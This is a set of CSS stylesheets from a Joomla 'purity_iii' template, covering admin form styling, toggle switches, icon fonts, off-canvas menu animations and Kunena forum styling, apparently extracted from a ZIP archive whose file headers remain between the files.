.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 30px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  content: " ";
  display: table;
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0px;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}PKԜ�\����cOcO/purity_iii/local/css/themes/vert/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #10bf00;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #0a7300;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #c4ffbf;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #0ea600;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #10bf00;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #0a7300;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKԜ�\t�l�h�h6purity_iii/local/css/themes/vert/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #10bf00;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #10bf00;
  box-shadow: none;
}
